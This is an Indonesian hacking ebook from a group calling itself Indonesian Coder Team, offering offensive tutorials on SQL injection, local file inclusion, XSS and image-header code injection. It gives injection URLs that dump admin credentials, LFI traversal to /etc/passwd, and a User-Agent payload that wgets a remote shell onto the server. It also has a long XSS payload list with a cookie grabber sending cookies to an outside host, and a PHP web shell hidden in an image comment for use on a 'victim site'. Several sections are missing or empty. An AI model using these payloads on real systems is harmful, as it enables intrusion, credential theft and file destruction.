(Indonesia) Intro To Hack Basic #1
(Indonesia) Intro To Hack Basic #1
# [+] Ringkasan
# [1] Pengertian sql injection
# [2] Local FIle Inclusion Step by Step
# [3] Tutorial dan Pengertian XSS ( Cross Site Scripting )
# [4] Image Code Injection with LFI Tutorial
# [5] Tutorial Blind SQL Injection Referensi Indonesia
# [6] RFI Tutorial By kaMtiEz
Ringkasan :
Ebook ini adalah Tutorial Basic dari teman-teman yang sebagian besar dari
Team Indonesian Coder
dan untuk kedepan nya akan ada lagi kelanjutan dari Ebook Intro To Hack
Basic ( To be Continue alias Bersambung :D )
Terima kasih untuk teman-teman dari Indonesian Coder Team sehingga bisa
membuat Ebook sederhana ini .
Marilah kita terus bangkit , jangan saling menyinggung dan jangan lah
berdiri sendiri-sendiri
Kita adalah team .. Indonesian Coder Team
Note :
We are One Unity, We are a Coder Family and We are Indonesian Coder
Team. Get the Codes and Feel the Soul.
===========
=step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk
melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100
==========
=step Dua:=
==========
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver
4 ini kita harus menebak sendiri table n column yg ada pada web tersebut
karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column
seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From
+Information_schema..
============
=step Empat:=
============
[site]/berita.php?id=-
100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
===========
=step Lima:=
===========
[site]/berita.php?id=-
100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from
+information_sche ma.tables+where+table_schema=database()--
[site]/berita.php?id=-
100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_sch
ema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal
yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
www.ascii-convert.co.cc
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-
100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_sch
ema.columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi
column),6,7,8+from+(nama table berasal)--
[site]/berita.php?id=-
100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admi
n--
==============
= step Delapan:=
==============
I. Penjelasan
II. Konsep
III. Bukti Konsep
IV. Perbaikan
V. Shout
I. Penjelasan
_________________________
Local File Inclusion (juga dikenal sebagai LFI) adalah proses termasuk
file di server melalui web browser. Kerentanan ini terjadi karena suatu
script include dalam file tersebut salah penggunaannya dan memungkinkan
direktori traversal karakter dapat dilansanakan.
II. Konsep
_________________________
Konsep serangan ini adalah perintah aplikasi untuk mengakses file komputer
yang tidak dimaksudkan untuk diakses. Serangan ini memanfaatkan kurangnya
keamanan (perangkat lunak ini bertindak persis seperti yang seharusnya)
sebagai lawan mengeksploitasi bug dalam kode.
[php]<?php
$template = 'red.php';
if ( isset( $_COOKIE['TEMPLATE'] ) )
$template = $_COOKIE['TEMPLATE'];
include ( "/home/xtux/include/templates/" . $template );
?>
[/php]
Sebuah serangan terhadap sistem ini bisa untuk mengirim permintaan HTTP
berikut:
[quote]index.php?option=com_ckforms&controller=[/quote]
http://namasitus.domain/index.php?option=com_ckforms &controller=
Sekarang mari kita periksa /etc/passwd untuk memastikan bahwa ini adalah
kerentanan Local File Inclusion.
[quote]http://namasitus.domain/index.php?option=com_ckforms
&controller= ../../../../../../../../../../../../../../../etc/passwd[/quote]
berhasil disertakan
[quote]root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP
User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin[/quote]
[quote]http://namasitus.domain/index.php?option=com_ckforms
&controller= ../../../../../../../../../../../../../../../proc/self/environ%
00[/quote]
[quote]DOCUMENT_ROOT=/home/xtux/public_html/ GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP_ACCEPT_ENCODING=gzip,deflate HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
HTTP_CONNECTION=keep-alive HTTP_HOST=www.namasitus.domain HTTP_KEEP_ALIVE=115
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 PATH=/bin:/usr/bin
QUERY_STRING=option=com_ckforms&controller=../../../../../../../../../../../.
./../../../proc/self/environ%00 REDIRECT_STATUS=200[/quote]
[quote]http://namasitus.domain/index.php?option=com_ckforms
&controller= ../../../../../../../../../../../../../../../etc/passwd[/quote]
Pilih Tamper dan pada kolom User-Agent isikan dengan kode berikut
[quote]<?system('wget http://hostingan.domain/shell.txt -O
shell.php');?>[/quote]
atau
[quote]<?exec('wget http://hostingan.domain/shell.txt -O
shell.php');?>[/quote]
kemudian tekan tombol submit. Hentikan Tamper Data, setelah itukita periksa
apakah kode berbahaya tersebut telah berhasil disuntikkan.
http://namasitus.domain/shell.php
IV. Perbaikan
_________________________
V. Shout
_________________________
[~] XSS adalah sebuah mol situs web dinamis dan merupakan bagian dari kode
keluarga injeksi.
[~] XSS tidak apa-apa kecuali modifikasi parameter melalui HTTP GET dan HTTP
POST
variabile pelaksanaan kode Javascript pada tingkat URL, tepat ditempatkan
dalam variabel atau lebih.
[~] Dalam menemukan apakah suatu 'XSS bukanlah tugas yang sulit, dan untuk
mengeksploitasi hanya kode sederhana javascript... javascript ...
[~] jika suatu website terkena serangan XSS makan muncul cookie alert
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.3v1L.org/cookiegrabber.php"></script>
<script>location.href="http://www.3v1L.org/cookiegrabber.php?
cookie="+escape( document.co
okie)</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83) )>
"><script>alert(0)</script>
"><script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</
script> <IMG LOWSRC=
\"javascript:alert('XSS')\"> <IMG
DYNSRC=\"javascript:alert('XSS')\">
[ Indonesia ] Intro To Hack Basic #1 Page 8
<font style='color:expression(alert(document·cookie))'>
'); alert('XSS
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
<body onunload="javascript:alert('XSS');">
<body onLoad="alert('XSS');"
[color:62ca=red' onmouseover="alert('xss')"]mouse over
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("gotcha !");
<div
style="x:expression((window.r==1)?'':eval('r=1;ale
rt(String.fromCharCode(88,83,83));'))">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE type="text/
css">BODY{background:url("javascript:alert('XSS')" )}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document·cookie)</script>
'""><script language="JavaScript"> alert('X \nS \nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
[~] XXS tuh termasuk injection.. cara kerjanya sama persis dengan SQL
Injection...
cuma disini yang membedakan kalo XXS itu lebih kearah manipulasi data
apache/session
Semoga Bermanfaat :D
.kaMtiEz
[ Thx TO ]
[+] INDONESIAN CODER TEAM - MAGELANG CYBER TEAM - EXPLOIT-ID - MALANG CYBER
CREW - ARUMBIA TEAM
[+]
tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,
Hakz,RyanAby,Albertwired
[+]
Contrex,YadoY666,MarahMeraH,k4mpret0,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1 c
k
[+] el_farahatz,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-
31,yur4kh4,MISTERFRIBO,GENI212,anharku,Jos_ali_joe
[ NOTE ]
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] every day is Holiday :D
[+] MAGELANGCYBER TEAM - Keluarga Besar Saya :))
[ QUOTE ]
[+] INDONESIANCODER still r0x
[+] MAGELANGCYBER Never Die :D
[+] nothing secure ..
Header Image
Banyak orang tidak tahu bahwa dalam foto-foto dan gambar di samping grafis, ada juga bidang
informasi pada header ini. Header ini hadir di semua gambar yang akan dibuat dalam hal
fotografi, atau dalam kasus program normal seperti Photoshop atau GIMP. Umumnya, mereka
berisi informasi seperti tanggal penciptaan, nama, ukuran, ukuran dan komentar.
Untuk memberikan ide saya akan menunjukkan gambar header saya:
Seperti yang anda lihat kolom “Komentar” Aku sudah dimasukkan dalam contoh pertama,
Avatar Forum, ini menunjukkan bahwa kita bisa mengubahnya sesuka hati, dan karena itu kita
bisa menggunakan teknik ini dengan menyisipkan script.
1 jhead namaimage.jpg
Ketika kita mengirim perintah tersebut, maka akan muncul keterangan seperti ditulis seperti
yang ditunjukkan dalam kotak keterangan di atas.
Sekarang untuk mengubah komentar, perintahnya adalah:
01 <?php
02 if($_GET["fvck"]=="distr"){
03 unlink($_GET["file"]);
04 }elseif($_GET["fvck"]=="list"){
05 $myDirectory = opendir($_GET["dir"]);
06 while($entryName = readdir($myDirectory)) {
07 $dirArray[] = $entryName;
08 }
09 closedir($myDirectory);
10 $indexCount = count($dirArray);
12 sort($dirArray);
15 }
16 }elseif($_GET["fvck"]=="vedi"){
17 echo htmlspecialchars(file_get_contents($_GET["file"]));
18 }elseif($_GET["fvck"]=="inc"){
19 include($_GET["file"]);
21 ?>
Setelah tersimpan kita harus menemukan sebuah situs dari LFI kereta seperti:
http://www.situskorban.com/index.php?file=home.php
Sekarang kita perlu meng-upload formulir di situs korban (misalnya memuat modul di avatar
forum), saya akan memasukkannya dengan menerapkan shell dengan perintah:
http://www.situskorban.com/index.php?file=img/avatar/avatartutorial.jpg&fvck=
list&dir=
Nah, jika shell pada situs ini bekerja dan saya akan menampilkan file yang berada di ruang web
korban, sekarang kita bisa menggunakan kesempatan ini untuk membaca file config.php jika ada
pada situs untuk menemukan informasi tentang database password dll.
+]Autho : jos_ali_joe
r [+]Contact :
[+]Home :josalijoe[at]ymail[dot]com
http://alicoder.wordpress.com/ &
http://indonesiancoder.com/
Pendahuluan
Maaf sebelum nya disini saya hanya memberikan apa yang memang saya pelajari
tentang Blind SQL Injectiuon
kalau mungkin dalam penjelasan ini kurang di mengeti mohon di maklumi hanya
tutor cupu dari saya
dan buat yang sudah master tentang Blind SQL kalau dari penjelasan saya ada
kesalahan mohon di luruskan
[~] Apa Itu Blind SQL Injection
Mari di sini kita membahas Blind SQL tanpa metode SQL Injection
Mungkin sudah banyak yang tahu tentang metode SQL Inject. Oke Lanjut :D
Blind SQL Ini adalah metode hacking yang memungkinkan seorang Attacker yang
tidak sah untuk mengakses server database.
Hal ini difasilitasi oleh sebuah kesalahan pengkodean umum: program menerima
data dari klien dan mengeksekusi query SQL tanpa terlebih dahulu memvalidasi
masukan klien.
Attacker kemudian bebas untuk mengekstrak, memodifikasi, menambah, atau
menghapus konten dari database
Attacker bahkan bisa menembus server database dan ke dalam operasi dasar
system web yang di eksekusi.
Attacker biasanya akan mengetes kerentanan SQL injection dengan mengirimkan
masukan aplikasi yang akan menyebabkan server untuk menghasilkan sebuah
query SQL yang tidak valid.
Jika server kemudian kembali mengirimkan pesan karena kesalahan ke klien, Si
Attacker akan mencoba untuk reverse-engineer bagian dari query SQL yang asli
menggunakan informasi yang diperoleh dari pesan kesalahan tersebut.
Ciri khas dari administratif safeguard hanya untuk melarang menampilkan
pesan kesalahan database server.
Sayangnya itu tidak cukup.Jika aplikasi anda tidak ada pesan error, mungkin
masih rentan terhadap serangan SQL
Maaf bahasa nya terlalu kurang di mengerti.
[~] Mendeteksi Blind SQL Injection
Aplikasi Web biasanya menggunakan query SQL dengan masukan klien yang
disertakan dalam klausa WHEREUntuk mengambil data dari database.
Dengan menambahkan kondisi tambahan untuk pernyataan SQL dan mengevaluasi
output aplikasi web, Anda dapat menentukan apakah atau tidak aplikasi yang
rentan terhadap SQL injection.
[~] Blind SQL Injection
Oke mari lanjut ke contoh Eksekusi Blind SQL Injection setelah di atas sudah
menjelaskan tentang apa itu Blind SQL Injection dan Mendeteksi nya.
[+] dalam hal ini RFI adalah remote file include / inclusion dimana kita
bisa melakukan require melalui injector //
[+] ok permisalan
[+] sekedar tutorial dari saya .. mohon maaf apa bila ada
salah / kekurangan dalam tutor ini .
[+] ./e0f